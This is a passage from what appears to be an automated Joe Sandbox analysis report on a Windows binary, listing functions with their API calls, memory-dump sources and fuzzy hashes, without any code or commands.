                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID:
                                                                                  • API String ID: 390214022-0
                                                                                  • Opcode ID: ffa7f9c5bffd323bb1a1d02527120cd226b19091b60ad275cd6b50cf90bea06d
                                                                                  • Instruction ID: 96420380e3573d645a0ac3767eccdea2391d2c65e085b2ba0d13fb23607fa965
                                                                                  • Opcode Fuzzy Hash: ffa7f9c5bffd323bb1a1d02527120cd226b19091b60ad275cd6b50cf90bea06d
                                                                                  • Instruction Fuzzy Hash: 9F110070910B08AFDF11FB69ECA399EBBF8EF65204F5060A1B414E7255DB349E498B20
                                                                                  Function 0041E140 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0041E164
                                                                                  • DialogBoxIndirectParamA.USER32(?,004A8C88,?,?,0041EA00,?), ref: 0041E1D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DialogIndirectParam_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3642580103-0
                                                                                  • Opcode ID: 94e404eea6ab7a91b876fa86f80d5c22935f469cb170d8c46225107290bf1702
                                                                                  • Instruction ID: dbeaf7730f8947f4481eb836a2ef357e9a1494175b06a7a2b05cc32a475520fa
                                                                                  • Opcode Fuzzy Hash: 94e404eea6ab7a91b876fa86f80d5c22935f469cb170d8c46225107290bf1702
                                                                                  • Instruction Fuzzy Hash: 9F2127B4A006189FDB14CF54DD91AEAB7B4EF48304F1041DEA849A7351EB70AE84CF95
                                                                                  Function 00466DE2 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00466DF0
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00466DF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 5a4eeaf07fb52be95e2137fb05e6a2a30ab435a785de69ec8d46153589e1a2b3
                                                                                  • Instruction ID: e032d37f9311a910772b8e37f36217913ac34c7058a93527963cbd76f6b6e92c
                                                                                  • Opcode Fuzzy Hash: 5a4eeaf07fb52be95e2137fb05e6a2a30ab435a785de69ec8d46153589e1a2b3
                                                                                  • Instruction Fuzzy Hash: 5201D8B46003145FC710FFB2D801F5E3A989F90719B01441FB8088B352DA3CC8408B6E
                                                                                  Function 6A6E19F0 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E2B30: _strrchr.LIBCMT ref: 6A6E2B47
                                                                                    • Part of subcall function 6A6DBF00: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                    • Part of subcall function 6A6DBF00: GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • DeleteFileA.KERNELBASE(?,?,?,6A6D184E,?), ref: 6A6E1A1F
                                                                                  • GetLastError.KERNEL32(?,?,6A6D184E,?), ref: 6A6E1A25
                                                                                    • Part of subcall function 6A6E10A0: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,6A6E1A0F,?,?,6A6D184E,?), ref: 6A6E10B5
                                                                                    • Part of subcall function 6A6E10A0: GetFileSize.KERNEL32(00000000,?,?,6A6E1A0F,?,?,6A6D184E,?), ref: 6A6E10CB
                                                                                    • Part of subcall function 6A6E10A0: CloseHandle.KERNEL32(00000000,?,6A6E1A0F,?,?,6A6D184E,?), ref: 6A6E10ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Handle$AddressCloseCreateDeleteErrorLastModuleProcSize_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 4044293305-0
                                                                                  • Opcode ID: 92462572b772e1906142f9e06969a1c41cba519b14d2f1d98357f68156f065f8
                                                                                  • Instruction ID: 5706a54251e1eedf83cb5e9941d47486fc54152c8cc8f2108617d904c8275eb6
                                                                                  • Opcode Fuzzy Hash: 92462572b772e1906142f9e06969a1c41cba519b14d2f1d98357f68156f065f8
                                                                                  • Instruction Fuzzy Hash: 09E06532B0E13203DB6223BDE80C36E92A4BF616A4B0B0171F800E7215EFA4CC5366F4
                                                                                  Function 0040A7B0 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 9741b04f4f756e8b00bc5e6b619a50bb9340d51e8345a8cb906ca8ace2a9c2be
                                                                                  • Instruction ID: 2061f451f3ddc61c2124fc7919633b662307f070fdd39f10640ae93d25407430
                                                                                  • Opcode Fuzzy Hash: 9741b04f4f756e8b00bc5e6b619a50bb9340d51e8345a8cb906ca8ace2a9c2be
                                                                                  • Instruction Fuzzy Hash: 06F0BB7094030856DB10EB759C4AFD9777C5B04704F40007E9505A72D2DE789998CAD6
                                                                                  Function 00407630 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(?,?,00000000,00000000,00000000,00000001), ref: 00407643
                                                                                  • DispatchMessageA.USER32(?,?,?,?,00000000,00000000,00000000,00000001), ref: 00407651
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeek
                                                                                  • String ID:
                                                                                  • API String ID: 1770753511-0
                                                                                  • Opcode ID: d7afd71ecbbf92ebb718570cc8c5b81866b758ac9b037cb983cc461c1654e27a
                                                                                  • Instruction ID: 6d3482b6396e4f8460ffee1d784be06b2f99ea529ceedf00a80f5f615736bc7c
                                                                                  • Opcode Fuzzy Hash: d7afd71ecbbf92ebb718570cc8c5b81866b758ac9b037cb983cc461c1654e27a
                                                                                  • Instruction Fuzzy Hash: 57E0CD71D4430A3AEA10F6B48C87FBF773C9744700F4045157A05651C1FAA9780282B6
                                                                                  Function 00409A40 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 669ed15c279bad6a4dbe956b154acd07b0bd99c8b55b6b31230c113f204651b9
                                                                                  • Instruction ID: 9be12ea9062a8ea4fa14570185c8da817658d49b918ee431695ef209e5e312a6
                                                                                  • Opcode Fuzzy Hash: 669ed15c279bad6a4dbe956b154acd07b0bd99c8b55b6b31230c113f204651b9
                                                                                  • Instruction Fuzzy Hash: A7E0BF70A00244EBDB149FB5AC49B167A68E705345F04457EA801522A2DE399D50CA5E
                                                                                  Function 0046E2F2 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0046E2FE
                                                                                    • Part of subcall function 00472D3D: __amsg_exit.LIBCMT ref: 00472D4D
                                                                                    • Part of subcall function 0046E2A9: __IsNonwritableInCurrentImage.LIBCMT ref: 0046E2B8
                                                                                    • Part of subcall function 0046E2A9: CloseHandle.KERNEL32(?,?,0046E313), ref: 0046E2DC
                                                                                    • Part of subcall function 0046E2A9: __freeptd.LIBCMT ref: 0046E2E3
                                                                                    • Part of subcall function 0046E2A9: RtlExitUserThread.NTDLL(?,00000000,?,0046E313), ref: 0046E2EC
                                                                                    • Part of subcall function 0046E2A9: __XcptFilter.LIBCMT ref: 0046E31F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentExitFilterHandleImageNonwritableThreadUserXcpt__amsg_exit__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 285482719-0
                                                                                  • Opcode ID: 4cfde0bc944054a5928bd31fc91d8162ee6307cc806889980e4f87cb81ed7dc8
                                                                                  • Instruction ID: 32ca70eec81774d22c6cc9951cb92662ace5203e54e813bbc637d288f271bbb0
                                                                                  • Opcode Fuzzy Hash: 4cfde0bc944054a5928bd31fc91d8162ee6307cc806889980e4f87cb81ed7dc8
                                                                                  • Instruction Fuzzy Hash: DBE08C74500200EFE718EBA2D80AE6D3761EF44704F20408EF0021B2A2CE7EAD409E19
                                                                                  Function 0046FE71 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0046FE7D
                                                                                    • Part of subcall function 00472D3D: __amsg_exit.LIBCMT ref: 00472D4D
                                                                                    • Part of subcall function 0046FE34: __IsNonwritableInCurrentImage.LIBCMT ref: 0046FE47
                                                                                    • Part of subcall function 0046FE34: __freeptd.LIBCMT ref: 0046FE61
                                                                                    • Part of subcall function 0046FE34: RtlExitUserThread.NTDLL(?,?,?,0046FE92,00000000), ref: 0046FE6B
                                                                                    • Part of subcall function 0046FE34: __XcptFilter.LIBCMT ref: 0046FE9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 808183036-0
                                                                                  • Opcode ID: a0f215879faab2a99b49faafd5c05ffb24655868c8072d89eb2c77a74e0c21ed
                                                                                  • Instruction ID: c0d98ab071554176574d50f2759169af7a2f2088870860b569fe1e6fd0226d74
                                                                                  • Opcode Fuzzy Hash: a0f215879faab2a99b49faafd5c05ffb24655868c8072d89eb2c77a74e0c21ed
                                                                                  • Instruction Fuzzy Hash: CDE08671500600DFDB18FBA1C80AE6D3764AF04704F20445EF002572A3CA7D6D40DE15
                                                                                  Function 0044C3D2 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0044C3D9
                                                                                    • Part of subcall function 004428ED: _malloc.LIBCMT ref: 0044290B
                                                                                    • Part of subcall function 0044C2F7: __EH_prolog3.LIBCMT ref: 0044C2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1683881009-0
                                                                                  • Opcode ID: d4b3a74f39ae5a5131e3f18b81a23a35ec426fea9819fae1491b4567d260bc75
                                                                                  • Instruction ID: 8bfab0cb2c45efdd4a13562e1dfda205ff69d936a71cec3f065992edea8ace96
                                                                                  • Opcode Fuzzy Hash: d4b3a74f39ae5a5131e3f18b81a23a35ec426fea9819fae1491b4567d260bc75
                                                                                  • Instruction Fuzzy Hash: B0510771900209BBFF51AFB5CD81ABF7BA5EF04304F14442BBD15A6291DB78DA00DBA9
                                                                                  Function 004369A0 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0044C3D2: __EH_prolog3.LIBCMT ref: 0044C3D9
                                                                                  • _strlen.LIBCMT ref: 00436B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 782648989-0
                                                                                  • Opcode ID: 7ef7f8c98d6133c237d645250cc3a0383d516b0403e2db28396ccee75b90f650
                                                                                  • Instruction ID: 300b3da589383ef56a5b1e059b05774fdd3ab924dc5075ee2610147f0af87bcd
                                                                                  • Opcode Fuzzy Hash: 7ef7f8c98d6133c237d645250cc3a0383d516b0403e2db28396ccee75b90f650
                                                                                  • Instruction Fuzzy Hash: 26516B70A00209EBDB14EF95D891FEEB7B4AF48304F20816AE915A72D1DB786A05CB59
                                                                                  Function 0BE97144 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8b2ea21cefc93775c9f2220716e082ea4c02950f9dea4b70666f30a52793540f
                                                                                  • Instruction ID: a1f159db1ef99974907daa39ddcbff3e3d819e88389a46008eea71cbda193ddd
                                                                                  • Opcode Fuzzy Hash: 8b2ea21cefc93775c9f2220716e082ea4c02950f9dea4b70666f30a52793540f
                                                                                  • Instruction Fuzzy Hash: 49413B71830A44DBCF2CDF24EAA67A2B7A1FB01304F14255EE80667655E736B928CB5C
                                                                                  Function 00440E60 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: 344a82ec800ee1aab126d6eeaae173ab5bdaf4960a409865b081bfba8e8d1763
                                                                                  • Instruction ID: 962407862648008ce1528614915580e2237ddcf5521db0ea1f5143fda63145cf
                                                                                  • Opcode Fuzzy Hash: 344a82ec800ee1aab126d6eeaae173ab5bdaf4960a409865b081bfba8e8d1763
                                                                                  • Instruction Fuzzy Hash: 704116B1E0010ADFDF24CF98C590ABEBBB1AF44304F20856AE61177341C778AA65CF99
                                                                                  Function 00459E37 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catch
                                                                                  • String ID:
                                                                                  • API String ID: 3886170330-0
                                                                                  • Opcode ID: f1173f366394ff5f36242959e70fb5a23e6ee143d2890556f3cce2382b519c85
                                                                                  • Instruction ID: c3faa33889a078bb04a157ed4c248709e55e61b394976f3d728e30fd389314ec
                                                                                  • Opcode Fuzzy Hash: f1173f366394ff5f36242959e70fb5a23e6ee143d2890556f3cce2382b519c85
                                                                                  • Instruction Fuzzy Hash: 33416A3120020AEFCF16DFA1C9419AE7BB6FF48306F15416AFC06AA2A2C739CD14DB55
                                                                                  Function 0BEA2590 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1927566239-0
                                                                                  • Opcode ID: 58e9d2d99919fff917ae713fc4e044ac18bdbb50b6199131d91b495ef87a7105
                                                                                  • Instruction ID: 9e8d04ef011298aad02e5204f42867b7f2f36965cd5de9a0525ae80e3aacaeb3
                                                                                  • Opcode Fuzzy Hash: 58e9d2d99919fff917ae713fc4e044ac18bdbb50b6199131d91b495ef87a7105
                                                                                  • Instruction Fuzzy Hash: 63315E71A05109AFDF14DFA8C8849AE77EDFB49A04F415461EE04EB640D331FA60CBA1
                                                                                  Function 0BE9AD77 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: 4ae669c18be742fdac3cf2e2c8ce3379cba186401cc1c01e9e9cc3ba601f98b2
                                                                                  • Instruction ID: e4897be0bb9c68208fee2f9bec50a274c2bfbf14121bdd83bda8271c61638f9b
                                                                                  • Opcode Fuzzy Hash: 4ae669c18be742fdac3cf2e2c8ce3379cba186401cc1c01e9e9cc3ba601f98b2
                                                                                  • Instruction Fuzzy Hash: 48114C735081499EFF258B74F8945EDBB67DF02F2DF183753D0A182682D611664D8319
                                                                                  Function 00404AB0 Relevance: 1.6, APIs: 1, Instructions: 80COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 2001391462-0
                                                                                  • Opcode ID: 8599ef356675452d96bbcf3efc03e01da238a59f0a54db95011423f29bcff75c
                                                                                  • Instruction ID: 01d5b713e0dbd86f9033e127ab19c252da0c95f3f6f17e54231300e5d926d747
                                                                                  • Opcode Fuzzy Hash: 8599ef356675452d96bbcf3efc03e01da238a59f0a54db95011423f29bcff75c
                                                                                  • Instruction Fuzzy Hash: 6331A7B4E0060ADFCB04DF98C891AAEB7B1FF88304F108699E515AB395D735AD41CF94
                                                                                  Function 0040A8D0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0040A902
                                                                                    • Part of subcall function 0040BB20: GetFileAttributesA.KERNEL32(?,0040A913,0040A913,00000000), ref: 0040BB2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile_memset
                                                                                  • String ID:
                                                                                  • API String ID: 231178003-0
